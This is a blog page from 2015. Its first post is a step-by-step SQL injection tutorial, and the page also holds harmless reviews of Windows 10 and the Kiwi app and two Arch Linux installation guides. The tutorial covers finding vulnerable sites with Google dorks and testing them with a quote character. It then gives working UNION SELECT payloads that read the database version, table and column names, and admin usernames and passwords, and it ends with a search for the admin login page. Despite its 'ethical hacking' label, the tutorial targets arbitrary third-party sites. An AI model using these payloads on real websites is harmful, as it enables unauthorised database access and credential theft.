Tuesday, October 6, 2015

Donning the Shoes of A Hacker to know about SQL Injection

The Internet has undoubtedly made knowledge ubiquitous, but along with this it has also generated a lot of vulnerabilities at the same time. There are a lot of malicious users who are in wake to find out the loopholes in your websites so as to attack. On the top now we have SQL injections which are the most effective and invasive way to attack.

You can be a victim, if...

There are a lot of SQL attacks which are being reported daily and there are ample lot of websites which are dependent on data driven designs in order to come up with dynamic content for their readers. As all these dynamic designs are build on MySQL or any other database which is dependent on SQL, wherefore this makes all of them exposed to the danger.

Getting Acquainted

SQL injection attacks  directly hit the database, therefore you need to have quite a good grasp or preliminary knowledge about the same before you start away with it. If you are starting the process you can certainly go for some learning tutorials for beginners which can tell you all that you need to know.

What are we discussing here? 

In this article, we will discuss how to attack a website using SQL injection. Moreover, I am writing this article just to know how these attacks make their way to their website and how can you ensure your safety from them. One must not forget that performing a SQL injection attack is circumventing the law and as we know flouting the rules has its own serious repercussions (so be cautions while performing). This article is a step towards ethical hacking.

Thinking like a hacker: Step wise analysis

* First they ByPass the Logins
* The second step is to access the secret data
* Then they modify the content of the website
* The last step is to shut down their database My SQL server

This was a succinct summary, we will now discuss this in detail.

Step 1: Searching for exposed/ vulnerable websites: 

Google being the king of the search engines works as the holy grail for hackers. In order to find the list of vulnerable websites hacker adopt Google's Dork list. Google dork programmed in a such a way that this it is used for finding hackable websites which uses the power of Google searching. In order to refine your search one can use a lot of tricks, but the best trick is to use “inurl:” command in order to find the websites which are prone to danger.

For example you can type in:

Searching : 
1. Copy any of these commands and paste in the search bar of Google.
2. Google will fetch you a list of web sites.
3. The you need to visit each of the websites to check their vulnerability factor.

Gauging the Vulnerability:

In order to check whether the website is  vulnerable or not ,add a single inverted comma (‘) at the end of websites url and then press enter. (There should be no space between single quotes and number.)

For instance:


If the webpage displayed on the browser remains unchanged or displays the error message of “page not found” or displays any other webpage, then this website is not hackable.

If after typing this the error message related to sql query comes, then the website is hackable.

For instance, error message such as

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1]

Step 3: Finding the Number of columns in the database:

Now that the hacker is  well aware of the fact that the website is vulnerable, his next move is to find columns existing the database table.

This is not a big task for them as all they need to do is to write “order by n” instead of that inverted comma ( they leave a space between this statement and number) .

Now they keep on changing the numbers starting n from 1, 2, …. till a error message stating “unknown column ” is displayed.

For eg:

    http://www.hackable.com/index.php?id=2 order by 1
    http://www.hackable.com/index.php?id=2 order by 2
    http://www.hackable.com/index.php?id=2 order by 3
    http://www.hackable.com/index.php?id=2 order by 4

Keep on changing the numbers till an error message stating “unknown column” pops up.

Let us suppose you got an error message on the 8th number, then the number of columns will be “n-1”, i.e. here it will be 7.

This is not an infallible method, thus if this method is not working ,then you can add “-” at the end of this statement

For instance:

    http://www.hackable.com/index.php?id=2 order by 1--

Step 4: Knowing the Vulnerable columns:

The hackers use the “union select columns_sequence” in order to find out the columns which are prone to danger. Now in this step the “order by n” statement is replaced with this one. After this the id value is swapped with a negative number, i.e. the id = -2, but there might be no need of doing so on some websites.

You also need to change columns_sequence from number from 1 to x-1 without separating them with commas.

For eg:

Let us suppose that the number of columns is 7 ,then the query will be

    http://www.hackable.com/index.php?id=-2 union select 1,2,3,4,5,6,7--

If this trick do not works then you can also try this:

    http://www.hackable.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--

Step 5: Fetching the  version, user, database

The third trick is to place “version()” in place of numeral 3.

For eg:

    http://www.hackable.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--

After doing so you will get to see a version 5.0 or 6.3. or similar to this.

Now, to find user() and database() you just need to keep them one by one in the place of version().

For eg:

  http://www.hackable.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--

  http://www.hackable.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--

Moreover, if the above trick is not working then you can try out this one:

    http://www.hackable.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--

Step 6:  Finding the Table Name

Finding the table name depends on the version of the SQL. So, from the aforementioned query if you have received version 5 or above. Then you need to follow the following steps. Firstly, you need to replace numeral 3 with

 “group_concat(table_name) and add the “from information_schema.tables where table_schema=database()”

You need to use the above query like this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--

Using this query will fetch you a list of the names of tables. Then after you need to find a table which is related to user or admin.

After this you need to pick the “admin”table.

If the site is of version 4 or of any other, then you need to guess the names of the tables. This is why it is difficult to perform SQL injection with version 4.

Step 7: Searching the  Column Name

In order to find the name of the column you need to replace  “group_concat(table_name) with “group_concat(column_name)”

and then  add “FROM information_schema.columns WHERE table_name=mysqlchar– in the place of  “from information_schema.tables where table_schema=database()–”

This step is a crucial one, as you need to change the table name to a string type named as MySql CHAR()  and then write it in place of mysqlchar.

Find MysqlChar() for Tablename:
First of all install the HackBar addon:

Now you to need to navigate to the the following path:

Now you need to copy and then paste the code in place if “mysqlchar” present in the URL
For eg:

    http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)–

Running this will fetch us the list of all the table names:
 admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas  s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..

Now write  group_concat(columnname,0x3a,anothercolumnname) in place of  group_concat(column_name).

Instead of listed columns you need to write down Columname and anothercolumname also.

Then you need to write “from table_name” in place of   “from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)”.

For eg:

    and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--

You won't be lucky all the times and you will get errors stating column not found. Therefore, you need to try other columns as well.

You can find columns of username and passwords.

If a website has accounts of users,  then this can prove to be a golden chicken for hackers.

Step 8: Fetching the Admin panel:

You need to start by trying with url like:


If you are lucky enough, you can get you victims admin url like this, else you can keep on trying with other permutations and combinations.

Author Biography:

Samuel Dawson has shared a great article below on how a SQL injection can be perfomed on a website. Currently he is a involved in converting psd to html files for Designs2html Ltd.

Friday, July 31, 2015

Windows 10 review: Microsoft takes back its identity

Windows 10 logo
Last night I installed Windows 10 and I've been using it. First of all, I think it's great, I really enjoy using it and the features are awesome. Here are some reason why I love Windows 10:

The start button is back, and it's better than ever

Windows 10 start button

This was one of the weakest points of Windows 8. Microsoft forgot for a moment its own good idea and left the beloved start button out of Windows 8, which resulted in several customer complains. Now the button is back, but it means more than just a button in the lower left corner of your screen. It means that Microsoft got the OS' identity back. One of the things I didn't like about Windows 8 is that the Metro view had the feeling of a completely different and independent operating system. It was like having an OS embedded into another OS. Now, we have a single and functional OS with Windows 10. Check Candy Crush installed from the Windows Store, running right on the desktop.

Windows 10 Candy Crush

Multiple desktops

This feature was absent in Windows when Mac OS and Linux had it years ago. It was something frustrating, but that's over. The multiple desktops are used seamlessly, and it actually is something that goes very well with Windows. I don't know why the did't include it before

It blazing fast

Windows 10 is much faster than Windows 8. At least, that my impression as I write this article. The windows open faster and the folders with large quantities of items (like photos) load much faster. In the past, you always had to upgrade your hardware to some extent. In this case, I'm using Windows 10 with the same hardware, but with better performance.

You can paste text in the CMD console!!

Yes, I think it was pretty annoying to write everything letter by letter, especially when you can paste in the Linux console.

Simplest OS update ever

The update to get Windows 10 was very, very simple. I didn't event to configure anything, the process is completely automatic. Also, the compatibility with my current software is excellent. So far, I didn't have problems with any application.

The Action Center

This feature contains general information about notifications, wireless connections, settings, etc. It's like the upper menu in Android. Really useful, a great addition that was missing in Windows 8.

Windows 10 action center

What I didn't like

  • The store is better, but it's not good enough yet
  • I heard about some problems with the drivers in HP machines, but I didn't face those problems. If I find something strange, I'll write about it here
  • Cortana is unavailable in many countries
There are some important features like Microsoft Edge, but I'll dedicate a complete article to that. For now, this is just a glimpse of Windows 10. And so far, I really like it!

Thursday, July 30, 2015

Review of Kiwi, the social app to ask questions

For some time I've heard about Kiwi, but I didn't pay much attention to it until now. After all, this app has been downloaded more than 10 million times.

When I first downloaded and used Kiwi, Twitter came to my mind. When it first came out, I thought it was just a waste of time, but eventually I learned how to use it properly, and now I have an active Twitter account. However, in the case of Kiwi, this is more like a way to know your friends better. It's like a little and enhanced piece of Facebook or Twitter.

Kiwi basically consists in asking questions to your contacts and answer their questions too.

The home screen shows a feed where you see the answers given by the people you are following:
Kiwi home screen

In the 'Nearby' screen, you can see you current location. You can ask question to nearby people. It is interesting that you can navigate to other locations and ask questions there. However, all of this is just for fun. Don't expect to fin meaningful answers in Kiwi.
New York nearby

The next screen is just a list of question for you to answer. Tap 'NEW QUESTION' to get a new list of questions.
Kiwi questions list
Tap the thunder icon to see your notifications. Here you'll find the usual stuff: likes to your answers, new answers to your questions, etc.
Finally, tap the right icon to open your profile.

I used Kiwi for about 4 days and I had fun, but I didn't communicate better with my aquantainces, nor did I get important news (as I do in Twitter). For now, my veredict would be "A waste of time". But I thought the same about Twitter and some other social networks when they first came out. In the case of Twitter, I realized that this social network is better to get instant news and to follow celebrities. I think this is not the intended main use for it, but it finally found an area where it can be useful. Is this the same case of Kiwi? It's very hard to say. I checked my friends' feed and sometimes it turns into a simple chat, where everybody says 'hello' instead of asking questions. What do I think about this? This app won't last much. But if it does, I'll be glad because it's fun and interesting.

By the way, I had a los of crashes when I first tried to use it, but it inmediately got better with a couple of updates.

Saturday, July 25, 2015

How to install Arch Linux, step by step, for VMware Workstation (Part III)

This is the final part of a tutorial I published in 3 parts (check part I and part II). Let's review what we have so far:
  • Create and boot a new Virtual Machine
  • Partition disk
  • Format partitions
  • Install basic system
To finish the installation, we still need to set some configurations:

Set main configuration

1. Generate the fstab file. This is a file that lists the disk partitions and other type of data resources in Linux systems. For more information, check the Wikipedia entry for fstab.To generate the fstab file:

genfstab -U -p /mnt >> /mnt/etc/fstab

2. Execute Chroot:

arch-chroot /mnt

Note: After this, the console will display something like this:

3. Set the machine's name:

nano /etc/hostname

The command will open an empty text file. Just enter the name for the machine:
Hostname Arch Linux
Once you have typed the name, press Ctrl + X. Then type 'Y' and press Enter.

4. Set the time zone. Here you have to select the correct time zone for your geographical location. I'll set the time zone to New York, just as an example:

ln -s /usr/share/zoneinfo/America/New_York /etc/localtime

5. Set language. I'll set this to English. First, open the 'locale.conf' file:

nano /etc/locale.conf

Once inside the file, add this text: LANG=en_US.UTF-8
Arch Linux Language
That will set the language to English (United States). Now press Ctrl + X, type 'Y' and press Enter.

6. Activate language:

nano /etc/locale.gen

Look for this text: #en_US.UTF-8 UTF-8 and delete the # symbol.

locale.gen file
ress Ctrl + X, type 'Y' and press Enter.

7. Generate locales:
Enter this in the console:

Generating locales

8. Configure keyboard:

nano /etc/vconsole.conf

Add KEYMAP=en to the file for a keyboard layout in English.

English keymap

9. Install GRUB. First, just install it with:

grub-install /dev/sda

GRUB installed
Now, you need to generate the grub.cfg file:

grub-mkconfig -o /boot/grub/grub.cfg
Generate grub.cfg

10. Generate ramdisk:

mkinitcpio -p linux
Generating ramdisk
11. Set a password for root:

Password for root
Next, close Chroot with: exit.
Exit Chroot

12. Restart the system:


After the restart, if everything went well, you should see this screen:
Congratulations! You just installed Arch Linux successfully! Of course, there are some additional configurations we have to make, and also a proper GUI. I'll address these topics in future posts.

Monday, July 20, 2015

How to install Arch Linux, step by step, for VMware Workstation (Part II)

Note: If you didn't see the first part of this series of articles, I recommend you to check it out here.

Last time I wrote about the first steps to install Arch Linux. Now I'll continue with some step just a little more complicated. To summarize what we have so far:
  • Create and boot a new Virtual Machine
  • Partition disk
This article will continue from there. The next immediate step is to format the partitions. Let's begin.

Format partitions

1. First, get the partition table so you know which partitions you are manipulating. To do that, enter this command in the console: lsblk
Also, you should remember which of those partition corresponds to which type. In this case:

  • sda1: boot 
  • sda2: root
  • sda3: home
  • sda4: swap

2. Format partitions. Enter the following commands:

For boot:

mkfs -t ext2 /dev/sda1 

For root:

mkfs.ext4 /dev/sda2

For home:

mkfs.ext4 /dev/sda3

For swap:

mkswap /dev/sda4
swapon /dev/sda4

3. Mount the partitions:

Mount the root partition:

mount /dev/sda2 /mnt

Create a folders for Boot and Home:

mkdir /mnt/home
mkdir /mnt/boot

Mount the Home and Boot partitions in the folders you just created:

mount /dev/sda1 /mnt/boot
mount /dev/sda3 /mnt/home

System installation

1. Install basic System. For this step, the first thing to do is to verify our internet connection. If you followed this guide and left the virtual machines's settings by default, you should have internet access. To verify that, type:

ping -c 3 www.google.com

You should see an output like this:

Ping output

Now, install the bases system with pacstrap:

pacstrap /mnt base base-devel

Next, a lot of packages will be downloaded and installed. When the process finished, you should see something like this:

Base system installed

Just in case, if your Internet connection fails for any reason, don't freak out, the downloads will retry when the connection comes back. This is just a detail, but it's worth mention.

2. Install GRUB. As you may already know, we need GRUB to boot the system. Install it with:

pacstrap /mnt grub-bios

As in step 4, some file will be downloaded:

Installing GRUB
3. Install Network Manager. This will help us with all the internet connections:

pacstrap /mnt networkmanager

And this is the end of the second part of this series of articles. We are almost ready to use our Arch Linux virtual machine, we just need to make some customization. I'll be writing about it soon!
Related Posts Plugin for WordPress, Blogger...